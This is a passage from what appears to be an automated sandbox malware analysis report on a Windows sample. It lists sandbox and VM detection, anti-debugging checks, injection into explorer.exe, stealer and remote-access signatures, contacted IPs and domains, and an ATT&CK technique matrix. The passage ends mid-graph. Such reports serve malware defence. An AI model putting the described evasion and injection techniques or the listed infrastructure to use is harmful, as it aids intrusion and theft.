              Source: C:\Users\user\AppData\Roaming\wideaecKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\AppData\Roaming\wideaecKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\C12E.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\C12E.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\C12E.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\C12E.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\C12E.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\C12E.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\AppData\Roaming\bbdeaecKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\AppData\Roaming\bbdeaecKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\AppData\Roaming\bbdeaecKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\AppData\Roaming\bbdeaecKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\AppData\Roaming\bbdeaecKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\AppData\Roaming\bbdeaecKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\Desktop\HaPJ2rPP6w.exeAPI/Special instruction interceptor: Address: 7FFE2220E814
              Source: C:\Users\user\Desktop\HaPJ2rPP6w.exeAPI/Special instruction interceptor: Address: 7FFE2220D584
              Source: C:\Users\user\AppData\Roaming\wideaecAPI/Special instruction interceptor: Address: 7FFE2220E814
              Source: C:\Users\user\AppData\Roaming\wideaecAPI/Special instruction interceptor: Address: 7FFE2220D584
              Source: C:\Users\user\AppData\Local\Temp\C12E.exeAPI/Special instruction interceptor: Address: 7FFE2220E814
              Source: C:\Users\user\AppData\Local\Temp\C12E.exeAPI/Special instruction interceptor: Address: 7FFE2220D584
              Source: C:\Users\user\AppData\Roaming\bbdeaecAPI/Special instruction interceptor: Address: 7FFE2220E814
              Source: C:\Users\user\AppData\Roaming\bbdeaecAPI/Special instruction interceptor: Address: 7FFE2220D584
              Source: wideaec, 00000005.00000002.2054030316.00000000006FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 417Jump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 810Jump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 659Jump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 2532Jump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 893Jump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 860Jump to behavior
              Source: C:\Users\user\AppData\Roaming\bbdeaecEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_13-4482
              Source: C:\Users\user\AppData\Roaming\wideaecEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_14-4481
              Source: C:\Users\user\AppData\Roaming\bbdeaecAPI coverage: 0.4 %
              Source: C:\Users\user\AppData\Roaming\wideaecAPI coverage: 0.4 %
              Source: C:\Windows\explorer.exe TID: 7420Thread sleep count: 417 > 30Jump to behavior
              Source: C:\Windows\explorer.exe TID: 7428Thread sleep count: 810 > 30Jump to behavior
              Source: C:\Windows\explorer.exe TID: 7428Thread sleep time: -81000s >= -30000sJump to behavior
              Source: C:\Windows\explorer.exe TID: 7424Thread sleep count: 659 > 30Jump to behavior
              Source: C:\Windows\explorer.exe TID: 7424Thread sleep time: -65900s >= -30000sJump to behavior
              Source: C:\Windows\explorer.exe TID: 7772Thread sleep count: 284 > 30Jump to behavior
              Source: C:\Windows\explorer.exe TID: 7776Thread sleep count: 274 > 30Jump to behavior
              Source: C:\Windows\explorer.exe TID: 7780Thread sleep count: 272 > 30Jump to behavior
              Source: C:\Windows\explorer.exe TID: 7968Thread sleep count: 85 > 30Jump to behavior
              Source: C:\Windows\explorer.exe TID: 7964Thread sleep count: 103 > 30Jump to behavior
              Source: C:\Windows\explorer.exe TID: 7428Thread sleep count: 2532 > 30Jump to behavior
              Source: C:\Windows\explorer.exe TID: 7428Thread sleep time: -253200s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\HaPJ2rPP6w.exeCode function: 0_2_004167C0 GetSystemTimeAdjustment followed by cmp: cmp dword ptr [00511ce4h], 11h and CTI: jne 004169C0h0_2_004167C0
              Source: C:\Users\user\AppData\Roaming\wideaecCode function: 5_2_004167C0 GetSystemTimeAdjustment followed by cmp: cmp dword ptr [00511ce4h], 11h and CTI: jne 004169C0h5_2_004167C0
              Source: C:\Users\user\AppData\Local\Temp\C12E.exeCode function: 6_2_00416EC0 GetSystemTimeAdjustment followed by cmp: cmp dword ptr [00512ce4h], 11h and CTI: jne 004170C0h6_2_00416EC0
              Source: C:\Users\user\AppData\Roaming\bbdeaecCode function: 12_2_00416EC0 GetSystemTimeAdjustment followed by cmp: cmp dword ptr [00512ce4h], 11h and CTI: jne 004170C0h12_2_00416EC0
              Source: C:\Users\user\AppData\Roaming\bbdeaecCode function: 13_2_00416EC0 GetSystemTimeAdjustment followed by cmp: cmp dword ptr [00512ce4h], 11h and CTI: jne 004170C0h13_2_00416EC0
              Source: C:\Users\user\AppData\Roaming\wideaecCode function: 14_2_004167C0 GetSystemTimeAdjustment followed by cmp: cmp dword ptr [00511ce4h], 11h and CTI: jne 004169C0h14_2_004167C0
              Source: C:\Users\user\AppData\Local\Temp\89ED.exeCode function: 7_2_00000001400040F4 GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,7_2_00000001400040F4
              Source: C:\Users\user\AppData\Local\Temp\89ED.exeCode function: 7_2_0000000140003A74 FindFirstFileW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPEAX@Z,??3@YAXPEAX@Z,7_2_0000000140003A74
              Source: explorer.exe, 00000001.00000000.1771459949.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
              Source: explorer.exe, 00000001.00000000.1770604413.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
              Source: explorer.exe, 00000001.00000000.1765948040.00000000078A0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
              Source: explorer.exe, 00000001.00000000.1771459949.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
              Source: explorer.exe, 00000001.00000000.1764591589.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
              Source: explorer.exe, 00000001.00000000.1771459949.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
              Source: explorer.exe, 00000001.00000000.1765948040.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
              Source: explorer.exe, 00000001.00000000.1770604413.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
              Source: explorer.exe, 00000001.00000000.1770604413.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1770604413.00000000097D4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: 89ED.exe, 00000007.00000002.2479502046.0000000000563000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
              Source: explorer.exe, 00000001.00000000.1771459949.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
              Source: explorer.exe, 00000001.00000000.1765948040.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
              Source: explorer.exe, 00000001.00000000.1770604413.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
              Source: explorer.exe, 00000001.00000000.1764591589.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
              Source: explorer.exe, 00000001.00000000.1764591589.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: C:\Users\user\AppData\Roaming\bbdeaecAPI call chain: ExitProcess graph end nodegraph_13-4484
              Source: C:\Users\user\AppData\Roaming\wideaecAPI call chain: ExitProcess graph end nodegraph_14-4483
              Source: C:\Users\user\Desktop\HaPJ2rPP6w.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\HaPJ2rPP6w.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Source: C:\Users\user\Desktop\HaPJ2rPP6w.exeSystem information queried: CodeIntegrityInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\wideaecSystem information queried: CodeIntegrityInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\C12E.exeSystem information queried: CodeIntegrityInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\bbdeaecSystem information queried: CodeIntegrityInformationJump to behavior
              Source: C:\Users\user\Desktop\HaPJ2rPP6w.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\AppData\Roaming\wideaecProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\C12E.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\AppData\Roaming\bbdeaecProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\AppData\Roaming\bbdeaecCode function: 13_2_0040386F _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_0040386F
              Source: C:\Users\user\AppData\Local\Temp\89ED.exeCode function: 7_2_00000001400029DC LoadLibraryA,GetProcAddress,GetNativeSystemInfo,7_2_00000001400029DC
              Source: C:\Users\user\Desktop\HaPJ2rPP6w.exeCode function: 0_2_006B092B mov eax, dword ptr fs:[00000030h]0_2_006B092B
              Source: C:\Users\user\Desktop\HaPJ2rPP6w.exeCode function: 0_2_006B0D90 mov eax, dword ptr fs:[00000030h]0_2_006B0D90
              Source: C:\Users\user\Desktop\HaPJ2rPP6w.exeCode function: 0_2_00850DE0 push dword ptr fs:[00000030h]0_2_00850DE0
              Source: C:\Users\user\AppData\Roaming\wideaecCode function: 5_2_0063092B mov eax, dword ptr fs:[00000030h]5_2_0063092B
              Source: C:\Users\user\AppData\Roaming\wideaecCode function: 5_2_00630D90 mov eax, dword ptr fs:[00000030h]5_2_00630D90
              Source: C:\Users\user\AppData\Roaming\wideaecCode function: 5_2_007101C0 push dword ptr fs:[00000030h]5_2_007101C0
              Source: C:\Users\user\AppData\Local\Temp\C12E.exeCode function: 6_2_0078FFD5 push dword ptr fs:[00000030h]6_2_0078FFD5
              Source: C:\Users\user\AppData\Local\Temp\C12E.exeCode function: 6_2_0216092B mov eax, dword ptr fs:[00000030h]6_2_0216092B
              Source: C:\Users\user\AppData\Local\Temp\C12E.exeCode function: 6_2_02160D90 mov eax, dword ptr fs:[00000030h]6_2_02160D90
              Source: C:\Users\user\AppData\Roaming\bbdeaecCode function: 12_2_005A092B mov eax, dword ptr fs:[00000030h]12_2_005A092B
              Source: C:\Users\user\AppData\Roaming\bbdeaecCode function: 12_2_005A0D90 mov eax, dword ptr fs:[00000030h]12_2_005A0D90
              Source: C:\Users\user\AppData\Roaming\bbdeaecCode function: 12_2_006B019D push dword ptr fs:[00000030h]12_2_006B019D
              Source: C:\Users\user\AppData\Local\Temp\89ED.exeCode function: 7_2_000000014001FA00 SetUnhandledExceptionFilter,7_2_000000014001FA00
              Source: C:\Users\user\AppData\Roaming\bbdeaecCode function: 13_2_0040386F _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_0040386F
              Source: C:\Users\user\AppData\Roaming\bbdeaecCode function: 13_2_00401000 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_00401000
              Source: C:\Users\user\AppData\Roaming\bbdeaecCode function: 13_2_0040602A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_0040602A
              Source: C:\Users\user\AppData\Roaming\bbdeaecCode function: 13_2_00404149 SetUnhandledExceptionFilter,13_2_00404149
              Source: C:\Users\user\AppData\Roaming\wideaecCode function: 14_2_0040386F _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_0040386F
              Source: C:\Users\user\AppData\Roaming\wideaecCode function: 14_2_00401000 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_00401000
              Source: C:\Users\user\AppData\Roaming\wideaecCode function: 14_2_0040602A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_0040602A
              Source: C:\Users\user\AppData\Roaming\wideaecCode function: 14_2_00404149 SetUnhandledExceptionFilter,14_2_00404149

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Windows\explorer.exeFile created: 89ED.exe.1.drJump to dropped file
              Source: C:\Windows\explorer.exeNetwork Connect: 217.197.91.145 443Jump to behavior
              Source: C:\Windows\explorer.exeNetwork Connect: 180.75.11.133 80Jump to behavior
              Source: C:\Windows\explorer.exeNetwork Connect: 177.129.90.106 80Jump to behavior
              Source: C:\Windows\explorer.exeNetwork Connect: 23.145.40.164 443Jump to behavior
              Source: C:\Users\user\Desktop\HaPJ2rPP6w.exeThread created: C:\Windows\explorer.exe EIP: 7DB19A8Jump to behavior
              Source: C:\Users\user\AppData\Roaming\wideaecThread created: unknown EIP: 87419A8Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\C12E.exeThread created: unknown EIP: 9B01970Jump to behavior
              Source: C:\Users\user\AppData\Roaming\bbdeaecThread created: unknown EIP: 9C81970Jump to behavior
              Source: C:\Users\user\Desktop\HaPJ2rPP6w.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
              Source: C:\Users\user\Desktop\HaPJ2rPP6w.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
              Source: C:\Users\user\AppData\Roaming\wideaecSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
              Source: C:\Users\user\AppData\Roaming\wideaecSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\C12E.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\C12E.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
              Source: C:\Users\user\AppData\Roaming\bbdeaecSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
              Source: C:\Users\user\AppData\Roaming\bbdeaecSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\89ED.exeCode function: 7_2_0000000140006C88 ??3@YAXPEAX@Z,ShellExecuteExW,WaitForSingleObject,CloseHandle,??3@YAXPEAX@Z,??3@YAXPEAX@Z,7_2_0000000140006C88
              Source: C:\Users\user\AppData\Local\Temp\89ED.exeCode function: 7_2_0000000140002A50 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,7_2_0000000140002A50
              Source: explorer.exe, 00000001.00000000.1770604413.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1765766695.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1764786826.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
              Source: explorer.exe, 00000001.00000000.1764786826.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
              Source: explorer.exe, 00000001.00000000.1764591589.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
              Source: explorer.exe, 00000001.00000000.1764786826.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
              Source: explorer.exe, 00000001.00000000.1764786826.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
              Source: C:\Users\user\AppData\Local\Temp\89ED.exeCode function: GetLastError,wsprintfW,GetEnvironmentVariableW,GetLastError,??2@YAPEAX_K@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPEAX@Z,SetLastError,lstrlenA,??2@YAPEAX_K@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar,7_2_00000001400027A0
              Source: C:\Users\user\AppData\Roaming\bbdeaecCode function: GetLocaleInfoA,13_2_00406DFC
              Source: C:\Users\user\AppData\Roaming\wideaecCode function: GetLocaleInfoA,14_2_00406DFC
              Source: C:\Users\user\Desktop\HaPJ2rPP6w.exeCode function: 0_2_004167C0 InterlockedCompareExchange,GetFocus,ReadConsoleW,FindAtomW,SetConsoleMode,GetDefaultCommConfigA,CopyFileA,CreatePipe,GetEnvironmentStringsW,ReadConsoleOutputA,GetModuleFileNameA,GetSystemTimeAdjustment,ObjectPrivilegeAuditAlarmA,ReleaseMutex,SetCommState,GetConsoleAliasesLengthW,GetComputerNameW,GetFileAttributesA,GetConsoleAliasExesLengthA,GetBinaryType,FormatMessageA,GetLongPathNameW,GetCommTimeouts,LoadLibraryW,MoveFileA,InterlockedDecrement,0_2_004167C0
              Source: C:\Users\user\AppData\Local\Temp\89ED.exeCode function: 7_2_0000000140007830 ?_set_new_handler@@YAP6AH_K@ZP6AH0@Z@Z,GetVersionExW,GetCommandLineW,_wtol,GetModuleFileNameW,_wtol,??2@YAPEAX_K@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,wsprintfW,??2@YAPEAX_K@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,_wtol,??3@YAXPEAX@Z,GetCommandLineW,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,GetCurrentProcess,SetProcessWorkingSetSizeEx,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??2@YAPEAX_K@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,CoInitialize,_wtol,??3@YAXPEAX@Z,GetKeyState,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,GetFileAttributesW,??3@YAXPEAX@Z,??3@YAXPEAX@Z,_wtol,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,SetLastError,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,SetCurrentDirectoryW,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,MessageBoxA,7_2_0000000140007830

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 12.3.bbdeaec.5c0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.C12E.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.C12E.exe.2160e67.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.bbdeaec.5a0e67.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.bbdeaec.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.3.C12E.exe.2170000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.1783799974.00000000006E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.2690701719.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000003.2348513596.0000000002170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2399641073.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1783748063.00000000006C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.2756823088.0000000000631000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2399602012.0000000002170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.2756188540.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2054000125.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2054109145.0000000002091000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 12.3.bbdeaec.5c0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.C12E.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.C12E.exe.2160e67.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.bbdeaec.5a0e67.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.bbdeaec.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.3.C12E.exe.2170000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.1783799974.00000000006E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.2690701719.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000003.2348513596.0000000002170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2399641073.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1783748063.00000000006C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.2756823088.0000000000631000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2399602012.0000000002170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.2756188540.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2054000125.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2054109145.0000000002091000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Command and Scripting Interpreter
              1
              DLL Side-Loading
              1
              Exploitation for Privilege Escalation
              11
              Masquerading
              OS Credential Dumping11
              System Time Discovery
              Remote Services1
              Archive Collected Data
              11
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Native API
              Boot or Logon Initialization Scripts32
              Process Injection
              12
              Virtualization/Sandbox Evasion
              LSASS Memory521
              Security Software Discovery
              Remote Desktop ProtocolData from Removable Media3
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Exploitation for Client Execution
              Logon Script (Windows)1
              DLL Side-Loading
              32
              Process Injection
              Security Account Manager12
              Virtualization/Sandbox Evasion
              SMB/Windows Admin SharesData from Network Shared Drive4
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Hidden Files and Directories
              NTDS3
              Process Discovery
              Distributed Component Object ModelInput Capture115
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
              Obfuscated Files or Information
              LSA Secrets1
              Application Window Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
              Software Packing
              Cached Domain Credentials2
              File and Directory Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading
              DCSync115
              System Information Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              File Deletion
              Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1526113 Sample: HaPJ2rPP6w.exe Startdate: 04/10/2024 Architecture: WINDOWS Score: 100 38 nwgrus.ru 2->38 40 codeberg.org 2->40 42 2 other IPs or domains 2->42 50 Suricata IDS alerts for network traffic 2->50 52 Found malware configuration 2->52 54 Malicious sample detected (through community Yara rule) 2->54 56 6 other signatures 2->56 9 HaPJ2rPP6w.exe 2->9         started        12 wideaec 2->12         started        14 bbdeaec 2->14         started        16 2 other processes 2->16 signatures3 process4 signatures5 74 Detected unpacking (changes PE section rights) 9->74 76 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 9->76 78 Maps a DLL or memory area into another process 9->78 18 explorer.exe 71 9 9->18 injected 80 Antivirus detection for dropped file 12->80 82 Multi AV Scanner detection for dropped file 12->82 84 Machine Learning detection for dropped file 12->84 86 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 12->86 88 Checks if the current machine is a virtual machine (disk enumeration) 14->88 90 Creates a thread in another existing process (thread injection) 14->90 92 Switches to a custom stack to bypass stack traces 14->92 process6 dnsIp7 44 180.75.11.133, 50039, 50040, 50041 WEBE-MY-AS-APWEBEDIGITALSDNBHDMY Malaysia 18->44 46 23.145.40.164, 443, 49792 SURFAIRWIRELESS-IN-01US Reserved 18->46 48 2 other IPs or domains 18->48 30 